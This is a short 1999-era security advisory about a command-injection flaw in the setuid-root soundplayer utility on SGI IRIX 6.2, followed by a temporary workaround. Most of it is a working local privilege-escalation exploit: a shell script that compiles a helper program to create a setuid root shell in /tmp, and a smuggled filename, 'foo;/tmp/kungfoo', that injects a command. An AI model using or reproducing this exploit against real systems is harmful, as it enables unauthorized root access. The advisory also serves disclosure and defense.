|
|
| |
| SGI's Irix operating system ships with an X11 application called soundplayer, which is used to play .WAV files. It is installed setuid root and is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command (with no spaces), the command will executed with elevated privileges (with the privileges soundplayer runs under). It is possible to compromise root access locally through exploitation of this vulnerability. It is confirmed that at least Irix 6.2 is vulnerable. |
| |
Credit:
The information was provided by: Loneguard.
|
| |
Vulnerable systems:
SGI IRIX 6.2
Exploit:
#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
#
cat > /tmp/crazymonkey.c << 'EOF'
main() {
setuid(0);
system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
}
EOF
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring
up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
Temporary workaround:
Remove the setuid root from the soundplayer utility.
|
|
|
